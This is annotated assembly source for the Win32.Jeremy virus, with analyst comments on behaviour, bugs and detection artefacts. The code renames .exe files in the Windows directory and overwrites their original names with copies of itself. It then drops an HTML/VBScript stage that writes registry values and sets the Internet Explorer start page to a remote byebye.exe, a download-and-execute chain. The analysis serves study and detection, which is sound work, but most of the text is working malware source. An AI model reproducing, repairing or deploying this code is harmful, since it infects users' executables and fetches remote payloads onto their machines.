Contribution - Win32.Jeremy [by Necronomikon]
;********************************
;******** Win32.Jeremy **********
;(c)by Necronomikon /ZeroGravity
;********************************
;Written for one of my real friends, who died in a car accident..... :(
;
;In memory of:
;-----------------
;Jeremy Stephan Garcia
;* 17.05.1984
;+ 08.04.2004
; Assembler: TASM/MASM-style syntax (.model flat, JUMPS, `extrn x:proc`,
; `offset`, `dup`, `dd ?`, @@-prefixed labels, `end jeremy`) -- not NASM,
; whatever the mirror's language tag says.
; Target: 32-bit Win32 user-mode PE; all OS interaction is via stdcall Win32
; imports called through the `api` macro in .code.
; `.586p` permits Pentium privileged mnemonics; none are used in this file.
.586p
; Single flat 32-bit segment model.
.model flat
; TASM: let the assembler widen out-of-range short jumps automatically.
JUMPS
; Initialised data.  Several buffers are Win32 output buffers whose sizes are
; hard-coded at the call sites in .code and do not always match the
; declarations below -- see the notes per buffer.
.data

; Passed to GetModuleHandleA as lpModuleName: 50 zero bytes, i.e. an empty
; string rather than NULL (see the call site for the consequence).
handle1 db 50 dup(0)

; Receives this executable's own path from GetModuleFileNameA (50-byte cap
; passed at the call site; longer paths are truncated).  Later the source
; operand of CopyFileA, i.e. the image written over each victim's name.
handle2 db 50 dup(0)

; Search mask for FindFirstFileA; resolved relative to the current
; directory, which the code first sets to the Windows directory.
maska db '*.exe',0

; Four bytes appended to a victim's base name after the '.' by two movsw,
; producing "<name>.dat." (the terminating zero is not copied).
zgrext db 'dat.',0

; Find handle from FindFirstFileA, reused by FindNextFileA; never FindClose'd.
handle_ dd 0

; Handle returned by the CreateFileA call on the freshly copied infected file.
_handle dd 0

; Receive buffer for FindFirstFileA/FindNextFileA, laid out as a
; WIN32_FIND_DATAA.  The first 44 bytes (attributes, three FILETIMEs, sizes,
; reserved) match the real structure, but the real cFileName member is
; MAX_PATH (260) bytes with cAlternateFileName at offset 304; only 50 bytes
; are reserved for nFileName here.  Each Find* call may therefore write up to
; 274 bytes from nFileName onward, overrunning nAltFileName, newfilename,
; path2 and the start of path3.
filedta:
FileAttributes dd 0
CreationTime db 8 dup(0)
LastAccessTime db 8 dup(0)
LastWriteTime db 8 dup(0)
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd 0
dwReserved1 dd 0
; Pre-filled with 50 'N's and no terminator of its own (the zeros of the
; adjacent nAltFileName end the string).  WinExec'd at `real:` before the
; first Find* call overwrites it.  The infection step writes 50 bytes into
; each dropped copy at file offset _off_ (2722), presumably so that the
; copy's nFileName holds the renamed host's name -- TODO confirm that _off_
; is the file offset of nFileName in the linked PE.
nFileName db 50 dup('N')
nAltFileName db 14 dup(0)

; Built by the copy loop: victim base name + '.' + "dat." .  Used as the new
; name for MoveFileA and as the 50-byte patch written into the dropped copy.
newfilename db 50 dup(0)

; Windows directory from GetWindowsDirectoryA (25-byte cap passed at the call
; site; per the API contract a longer path is not copied and the buffer stays
; empty, so the later SetCurrentDirectoryA would fail silently).
path2 db 25 dup(0)

; Original current directory from GetCurrentDirectoryA; never read afterwards.
path3 db 260 dup(0)

; MessageBoxA caption and text shown at start-up.
szTitle db "*** Win32.Jeremy ***",0
szMessage db "*****************************************************************************",13,10
db "**Written for one of my friends,who died through an car accident**",13,10
db "*****************************************************************************",13,10
db "** (c) by Necronomikon / ZeroGravity **",13,10
db "*****************************************************************************",0
; ---- Second stage: HTML + VBScript dropper written to %WINDIR%\jeremy.htm ----

; Handle returned by _lcreat for the .htm file.
htm_handle dd ?

; Appended to the Windows directory path to form the drop location.
htmdropper db '\jeremy.htm', 0

; Full path buffer (Windows dir + htmdropper).  220 bytes, although the
; GetWindowsDirectoryA call site only passes a 50-byte cap.
szhtm db 220 dup (0)

; htm_: the dropped file, stored as decimal byte values (13,10 = CRLF).
; Decoded, the HTML part is a black page with a rainbow-coloured
; "Win32.Jeremy" banner, the title "...and once again one of my pals...!?"
; and the dedication text; it ends with this VBScript:
;
;   <Script Language=vbs>
;   rem win32.jeremy
;   rem (c) by Necronomikon/ZG
;   Set downloader = CreateObject("WScript.Shell")
;   downloader.regwrite "HKCU\software\win32Jeremy\", "(c)by Necronomikon/ZeroGravity"
;   Set Jeremy= Createobject("scripting.filesystemobject")
;   Jeremy.copyfile wscript.scriptfullname,Jeremy.GetSpecialFolder(0)&_
;   "\jeremy.vbs"
;   ZGravity= ""
;   ZGravity= downloader.regread("HKCU\Software\Microsoft\Internet Explorer\Download Directory")
;   If (ZGravity= "") Then
;   ZGravity = "c:"
;   End If
;   If Right(ZGravity, 1) = " \ " Then ZGravity = Mid(ZGravity, 1, Len(ZGravity) - 1)
;   If Not (Jeremy.fileexists(Jeremy.getspecialfolder(0) & "\byebye.exe")) Then
;   If Not (Jeremy.fileexists(ZGravity & "\byebye.exe")) Then
;   downloader.regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",_
;   "http://win32jeremy.tripod.com/byebye.exe"
;   downloader.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUN",_
;   Jeremy.getspecialfolder(0) & "\byebye.exe"
;   Else
;   downloader.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page",_
;   "about:blank"
;   Jeremy.copyfile ZGravity & "\byebye.exe",_
;   Jeremy.getspecialfolder(0) & "\byebye.exe"
;   downloader.run Jeremy.getspecialfolder(0) & "\byebye.exe", 1, False
;   end if
;   </script>
;
; Analyst notes on the script:
;  * Infection marker: key HKCU\Software\win32Jeremy with its default value
;    set to the copyright string (WScript.Shell.RegWrite on a name ending in
;    '\' writes the key's default value).
;  * Persistence attempt: the RUN write has NO trailing backslash, so per
;    RegWrite semantics it creates a value literally named "RUN" under
;    HKCU\Software\Microsoft\Windows\CurrentVersion, not an entry in the Run
;    key -- nothing is autostarted, but it is a useful detection artefact.
;  * Download chain: if byebye.exe exists in neither %WINDIR% nor IE's
;    download directory, IE's Start Page is pointed at
;    http://win32jeremy.tripod.com/byebye.exe so a later IE start fetches it;
;    once present it is copied to %WINDIR%\byebye.exe and run, and the Start
;    Page is reset to about:blank.  byebye.exe itself is not in this listing.
;  * `Right(ZGravity, 1) = " \ "` compares one character with a
;    three-character string and is therefore always False; a trailing
;    backslash is never stripped.
;  * `wscript.scriptfullname` is a WSH object.  Inside a page rendered by IE
;    it is not defined and there is no On Error Resume Next, so when opened
;    as .htm the script presumably aborts at the copyfile line before any of
;    the registry/download logic runs -- TODO confirm on a period system.
; The trailing 13,10,13,10,0 is counted by script_size2, so the NUL byte is
; written to the file as well.
htm_ db 60,104,116,109,108,62,13,10,13,10,60,98,111,100,121,32
db 98,103,99,111,108,111,114,61,34,98,108,97,99,107,34,32
db 108,105,110,107,61,34,35,48,48,48,48,48,48,34,32,118
db 108,105,110,107,61,34,35,48,48,48,48,48,48,34,32,97
db 108,105,110,107,61,34,35,102,102,48,48,48,48,34,32,116
db 101,120,116,61,108,105,109,101,62,13,10,60,99,101,110,116
db 101,114,62,13,10,60,98,114,62,13,10,60,102,111,110,116
db 32,115,105,122,101,61,43,50,62,60,117,62,60,98,62,60
db 102,111,110,116,32,99,111,108,111,114,61,34,35,48,48,56
db 48,70,70,34,62,87,60,47,102,111,110,116,62,60,102,111
db 110,116,32,99,111,108,111,114,61,34,35,48,48,56,67,69
db 56,34,62,105,60,47,102,111,110,116,62,60,102,111,110,116
db 32,99,111,108,111,114,61,34,35,48,48,57,55,68,49,34
db 62,110,60,47,102,111,110,116,62,60,102,111,110,116,32,99
db 111,108,111,114,61,34,35,48,48,65,51,66,57,34,62,51
db 60,47,102,111,110,116,62,60,102,111,110,116,32,99,111,108
db 111,114,61,34,35,48,48,65,69,65,50,34,62,50,60,47
db 102,111,110,116,62,60,102,111,110,116,32,99,111,108,111,114
db 61,34,35,48,48,66,65,56,66,34,62,46,60,47,102,111
db 110,116,62,60,102,111,110,116,32,99,111,108,111,114,61,34
db 35,48,48,67,53,55,52,34,62,74,60,47,102,111,110,116
db 62,60,102,111,110,116,32,99,111,108,111,114,61,34,35,48
db 48,68,49,53,68,34,62,101,60,47,102,111,110,116,62,60
db 102,111,110,116,32,99,111,108,111,114,61,34,35,48,48,68
db 67,52,54,34,62,114,60,47,102,111,110,116,62,60,102,111
db 110,116,32,99,111,108,111,114,61,34,35,48,48,69,56,50
db 69,34,62,101,60,47,102,111,110,116,62,60,102,111,110,116
db 32,99,111,108,111,114,61,34,35,48,48,70,51,49,55,34
db 62,109,60,47,102,111,110,116,62,60,102,111,110,116,32,99
db 111,108,111,114,61,34,35,48,48,70,70,48,48,34,62,121
db 60,47,102,111,110,116,62,60,47,102,111,110,116,62,60,47
db 117,62,60,98,114,62,60,98,114,62,60,98,114,62,13,10
db 60,116,105,116,108,101,62,46,46,46,97,110,100,32,111,110
db 99,101,32,97,103,97,105,110,32,111,110,101,32,111,102,32
db 109,121,32,112,97,108,115,46,46,46,33,63,60,47,116,105
db 116,108,101,62,13,10,60,102,111,110,116,32,115,105,122,101
db 61,45,49,32,99,111,108,111,114,61,119,104,105,116,101,62
db 43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,60
db 98,114,62,60,98,114,62,13,10,87,114,105,116,116,101,110
db 32,102,111,114,32,111,110,101,32,111,102,32,109,121,32,102
db 114,105,101,110,100,115,32,119,104,111,32,100,105,101,100,32
db 116,104,114,111,117,103,104,32,97,110,32,99,97,114,32,97
db 99,99,105,100,101,110,116,13,10,60,98,114,62,60,98,114
db 62,13,10,40,99,41,111,100,101,100,32,105,110,32,71,101
db 114,109,97,110,89,32,50,111,111,52,60,98,114,62,60,98
db 114,62,98,121,32,78,101,99,114,111,110,111,109,105,107,111
db 110,47,90,101,114,111,71,114,97,118,105,116,121,60,98,114
db 62,13,10,60,98,114,62,60,98,114,62,60,47,102,111,110
db 116,62,13,10,60,83,99,114,105,112,116,32,76,97,110,103
db 117,97,103,101,61,118,98,115,62,13,10,114,101,109,32,119
db 105,110,51,50,46,106,101,114,101,109,121,13,10,114,101,109
db 32,40,99,41,32,98,121,32,78,101,99,114,111,110,111,109
db 105,107,111,110,47,90,71,13,10,83,101,116,32,100,111,119
db 110,108,111,97,100,101,114,32,61,32,67,114,101,97,116,101
db 79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46
db 83,104,101,108,108,34,41,13,10,100,111,119,110,108,111,97
db 100,101,114,46,114,101,103,119,114,105,116,101,32,34,72,75
db 67,85,92,115,111,102,116,119,97,114,101,92,119,105,110,51
db 50,74,101,114,101,109,121,92,34,44,32,34,40,99,41,98
db 121,32,78,101,99,114,111,110,111,109,105,107,111,110,47,90
db 101,114,111,71,114,97,118,105,116,121,34,13,10,83,101,116
db 32,74,101,114,101,109,121,61,32,67,114,101,97,116,101,111
db 98,106,101,99,116,40,34,115,99,114,105,112,116,105,110,103
db 46,102,105,108,101,115,121,115,116,101,109,111,98,106,101,99
db 116,34,41,13,10,74,101,114,101,109,121,46,99,111,112,121
db 102,105,108,101,32,119,115,99,114,105,112,116,46,115,99,114
db 105,112,116,102,117,108,108,110,97,109,101,44,74,101,114,101
db 109,121,46,71,101,116,83,112,101,99,105,97,108,70,111,108
db 100,101,114,40,48,41,38,95,13,10,34,92,106,101,114,101
db 109,121,46,118,98,115,34,13,10,90,71,114,97,118,105,116
db 121,61,32,34,34,13,10,90,71,114,97,118,105,116,121,61
db 32,100,111,119,110,108,111,97,100,101,114,46,114,101,103,114
db 101,97,100,40,34,72,75,67,85,92,83,111,102,116,119,97
db 114,101,92,77,105,99,114,111,115,111,102,116,92,73,110,116
db 101,114,110,101,116,32,69,120,112,108,111,114,101,114,92,68
db 111,119,110,108,111,97,100,32,68,105,114,101,99,116,111,114
db 121,34,41,13,10,73,102,32,40,90,71,114,97,118,105,116
db 121,61,32,34,34,41,32,84,104,101,110,13,10,90,71,114
db 97,118,105,116,121,32,61,32,34,99,58,34,13,10,69,110
db 100,32,73,102,13,10,73,102,32,82,105,103,104,116,40,90
db 71,114,97,118,105,116,121,44,32,49,41,32,61,32,34,32
db 92,32,34,32,84,104,101,110,32,90,71,114,97,118,105,116
db 121,32,61,32,77,105,100,40,90,71,114,97,118,105,116,121
db 44,32,49,44,32,76,101,110,40,90,71,114,97,118,105,116
db 121,41,32,45,32,49,41,13,10,73,102,32,78,111,116,32
db 40,74,101,114,101,109,121,46,102,105,108,101,101,120,105,115
db 116,115,40,74,101,114,101,109,121,46,103,101,116,115,112,101
db 99,105,97,108,102,111,108,100,101,114,40,48,41,32,38,32
db 34,92,98,121,101,98,121,101,46,101,120,101,34,41,41,32
db 84,104,101,110,13,10,73,102,32,78,111,116,32,40,74,101
db 114,101,109,121,46,102,105,108,101,101,120,105,115,116,115,40
db 90,71,114,97,118,105,116,121,32,38,32,34,92,98,121,101
db 98,121,101,46,101,120,101,34,41,41,32,84,104,101,110,13
db 10,100,111,119,110,108,111,97,100,101,114,46,114,101,103,119
db 114,105,116,101,32,34,72,75,67,85,92,83,111,102,116,119
db 97,114,101,92,77,105,99,114,111,115,111,102,116,92,73,110
db 116,101,114,110,101,116,32,69,120,112,108,111,114,101,114,92
db 77,97,105,110,92,83,116,97,114,116,32,80,97,103,101,34
db 44,95,13,10,34,104,116,116,112,58,47,47,119,105,110,51
db 50,106,101,114,101,109,121,46,116,114,105,112,111,100,46,99
db 111,109,47,98,121,101,98,121,101,46,101,120,101,34,13,10
db 100,111,119,110,108,111,97,100,101,114,46,114,101,103,119,114
db 105,116,101,32,34,72,75,69,89,95,67,85,82,82,69,78
db 84,95,85,83,69,82,92,83,111,102,116,119,97,114,101,92
db 77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119
db 115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110
db 92,82,85,78,34,44,95,13,10,74,101,114,101,109,121,46
db 103,101,116,115,112,101,99,105,97,108,102,111,108,100,101,114
db 40,48,41,32,38,32,34,92,98,121,101,98,121,101,46,101
db 120,101,34,13,10,69,108,115,101,13,10,100,111,119,110,108
db 111,97,100,101,114,46,114,101,103,119,114,105,116,101,32,34
db 72,75,69,89,95,67,85,82,82,69,78,84,95,85,83,69
db 82,92,83,111,102,116,119,97,114,101,92,77,105,99,114,111
db 115,111,102,116,92,73,110,116,101,114,110,101,116,32,69,120
db 112,108,111,114,101,114,92,77,97,105,110,92,83,116,97,114
db 116,32,80,97,103,101,34,44,95,13,10,34,97,98,111,117
db 116,58,98,108,97,110,107,34,13,10,74,101,114,101,109,121
db 46,99,111,112,121,102,105,108,101,32,90,71,114,97,118,105
db 116,121,32,38,32,34,92,98,121,101,98,121,101,46,101,120
db 101,34,44,95,13,10,74,101,114,101,109,121,46,103,101,116
db 115,112,101,99,105,97,108,102,111,108,100,101,114,40,48,41
db 32,38,32,34,92,98,121,101,98,121,101,46,101,120,101,34
db 13,10,100,111,119,110,108,111,97,100,101,114,46,114,117,110
db 32,74,101,114,101,109,121,46,103,101,116,115,112,101,99,105
db 97,108,102,111,108,100,101,114,40,48,41,32,38,32,34,92
db 98,121,101,98,121,101,46,101,120,101,34,44,32,49,44,32
db 70,97,108,115,101,13,10,101,110,100,32,105,102,13,10,60
db 47,115,99,114,105,112,116,62,13,10,60,47,66,79,68,89
db 62,13,10,60,47,104,116,109,108,62,13,10,13,10,0

; Byte count of htm_ as written by _lwrite (includes the trailing 0).
script_size2 equ $-htm_

; File offset at which the infection step overwrites 50 bytes of the dropped
; copy with newfilename; presumably the position of nFileName in the linked
; PE -- TODO confirm against the built binary.
_off_ equ 2722d

; Project-local include; its contents are not part of this listing.
include useful.inc
; Code section.
.code

; api <Name>: declare Win32 import `Name` as an external proc and call it.
; Call sites push arguments right-to-left beforehand; because the Win32
; imports are stdcall the callee pops its parameters, so a call site that
; pushes the wrong count leaves ESP unbalanced (several sites below do --
; MoveFileA pushes one too many, CreateFileA and WriteFile push too few).
api macro a
extrn a:proc
call a
endm
; Program entry (`end jeremy`).  What the code below does, in order:
;   1. MessageBoxA with the dedication text.
;   2. WinExec(nFileName): in a fresh build nFileName is "NNN...".  The
;      infection step writes newfilename into each dropped copy at _off_,
;      presumably so a copy's nFileName holds the renamed host
;      ("<name>.dat.") and launches it here -- TODO confirm _off_ maps to
;      nFileName in the linked PE.
;   3. chdir %WINDIR%, read own path, enumerate *.exe there; per victim:
;      rename it to "<name>.dat.", CopyFileA own image over the original
;      name, write newfilename into the copy at _off_.
;   4. At end of enumeration: drop %WINDIR%\jeremy.htm (htm_) and WinExec.
; Host artefacts to hunt for: %WINDIR%\*.dat., %WINDIR%\jeremy.htm, plus the
; registry/file writes listed at htm_ (HKCU\Software\win32Jeremy, a "RUN"
; value under HKCU\...\CurrentVersion, %WINDIR%\jeremy.vbs, byebye.exe,
; IE Start Page).  Needs write access to the Windows directory; no privilege
; escalation.  Several call sites push the wrong number of stdcall
; arguments (noted inline), so behaviour after them depends on stack garbage.
jeremy:

push 00000000h ; Parameters for MessageBoxA
push offset szTitle
push offset szMessage
push 00000000h
api MessageBoxA

; Reached only by fall-through: the `je real` further down sits after an
; unconditional jmp and never executes, so this block runs once.
real:
; WinExec(nFileName, SW_SHOWNORMAL).
push 00000001
push offset nFileName
api WinExec

; GetCurrentDirectoryA(260, path3); path3 is not used afterwards.
push offset path3
push 260
api GetCurrentDirectoryA

; GetWindowsDirectoryA(path2, 25).
push 25
push offset path2
api GetWindowsDirectoryA

; SetCurrentDirectoryA(path2): every relative file operation that follows
; (FindFirstFileA "*.exe", MoveFileA, CopyFileA, CreateFileA) acts on the
; Windows directory.  Return value unchecked.
push offset path2
api SetCurrentDirectoryA

; GetModuleHandleA(handle1): handle1 is an empty string, not NULL.  Whether
; "" resolves like NULL is not something this listing shows; either way the
; result goes straight into GetModuleFileNameA, which yields the calling
; executable's path for a NULL module too.
push offset handle1
api GetModuleHandleA

; GetModuleFileNameA(eax, handle2, 50): own path into handle2.
push 50
push offset handle2
push eax
api GetModuleFileNameA

; FindFirstFileA("*.exe", filedta).  filedta is shorter than a real
; WIN32_FIND_DATAA (see .data), so this write can overrun into the buffers
; that follow nFileName.
push offset filedta
push offset maska
api FindFirstFileA

; Failure test compares against 0, but FindFirstFileA reports failure with
; INVALID_HANDLE_VALUE (-1): this branch is never taken on failure and the
; loop below then runs on whatever filedta contains.
mov dword ptr [handle_],eax
cmp eax, 0
je @@dropfile ; <-------------

; Self-recognition attempt.  bx holds the first TWO bytes of the file name,
; and every cmp tests that same word against a zero-extended single letter
; ('J' = 004Ah etc.); a match needs byte 0 == letter AND byte 1 == 0, i.e.
; a one-character name.  Presumably meant to skip names starting "JEREMY";
; as written it does not reliably recognise the virus's own copies.
check:
mov bx, word ptr[nFileName]
cmp bx, 'J'
je nextfile
cmp bx, 'E'
je nextfile
cmp bx, 'R'
je nextfile
cmp bx, 'E'
je nextfile
cmp bx, 'M'
je nextfile
cmp bx, 'Y'
je nextfile

; Build newfilename = victim name up to (not including) the first '.'.
lea esi, [nFileName]
lea edi, [newfilename]

; Copy bytes until the first '.'; there is no length bound, so this relies
; on a '.' being present (the "*.exe" mask provides one when filedta is sane).
stowit:
lodsb
cmp al, '.'
je addext
stosb
jmp stowit

; Store the '.' and append the four bytes "dat." (no terminator copied),
; giving "<name>.dat.".  edi is left pointing just past that and is later
; (mis)used as the WinExec command line at @@dropfile.
addext:
stosb
lea esi, [zgrext]
movsw
movsw
; MoveFileA(nFileName, newfilename): rename the victim.  Three dwords are
; pushed for a two-parameter API, leaving one stray dword on the stack.
push 0
push offset newfilename
push offset nFileName
api MoveFileA
;api lstrcat
; CopyFileA(handle2, nFileName, FALSE): write own image under the victim's
; original name (companion-style infection).
push 0
push offset nFileName
push offset handle2
api CopyFileA

; CreateFileA with only two arguments pushed -- the list matches
; _lcreat(name, 2), not CreateFileA's seven parameters.  The five missing
; parameters are read from whatever sits above on the stack and the callee
; pops 28 bytes, so ESP is off by 20 from here on.
push 2
push offset nFileName
api CreateFileA

mov dword ptr [_handle],eax

; SetFilePointer(h, _off_, NULL, FILE_BEGIN).
push dword 0
push 0
push _off_
push eax
api SetFilePointer

mov eax, dword ptr [_handle]

; WriteFile(h, newfilename, 50, ?, ?): only three of five arguments pushed;
; lpNumberOfBytesWritten/lpOverlapped come from stack garbage and the callee
; pops 20 bytes.  Intent: patch the renamed host's name into the dropped
; copy at _off_.
push 50
push offset newfilename
push eax
api WriteFile

; eax now holds WriteFile's BOOL result, not the file handle, so this closes
; the wrong handle; _handle itself is never closed.
push eax
api _lclose
jmp nextfile
; Dead code: the jmp above is unconditional.
je real

; Drop the HTML/VBScript stage to %WINDIR%\jeremy.htm.  Entered when
; FindNextFileA returns 0 and, because it falls through into nextfile, which
; fails again on the exhausted handle, re-entered on every pass: barring an
; earlier crash the process keeps rewriting jeremy.htm until killed, and
; bailout is never reached.
@@dropfile:
; GetWindowsDirectoryA(szhtm, 50).
push 50
push offset szhtm
api GetWindowsDirectoryA

; lstrcat(szhtm, "\jeremy.htm").
push offset htmdropper
push offset szhtm
api lstrcat

; _lcreat(szhtm, 0): create/truncate the file with normal attributes.
push 0
push offset szhtm
api _lcreat
mov [htm_handle],eax

; _lwrite(h, htm_, script_size2); the size includes htm_'s trailing 0 byte.
push script_size2
push offset htm_
push [htm_handle]
api _lwrite

push [htm_handle]
api _lclose

; WinExec(edi, SW_HIDE).  edi is NOT szhtm: it last pointed past the end of
; newfilename (or is unset if no file was processed), so this launches
; whatever that memory holds.  Even with `offset szhtm` here, WinExec runs
; executable images, not documents; opening a .htm by association would
; normally need ShellExecute.
push 0
push edi
api WinExec

; FindNextFileA(handle_, filedta); 0 means no more files (or a bad handle).
nextfile:

push offset filedta
mov eax, dword ptr [handle_]
push eax
api FindNextFileA
cmp eax, 0
je @@dropfile ; <-----------------
jmp check

; Unreachable: nothing jumps to bailout, and FindClose is never called.
bailout:
push 0
api ExitProcess

end jeremy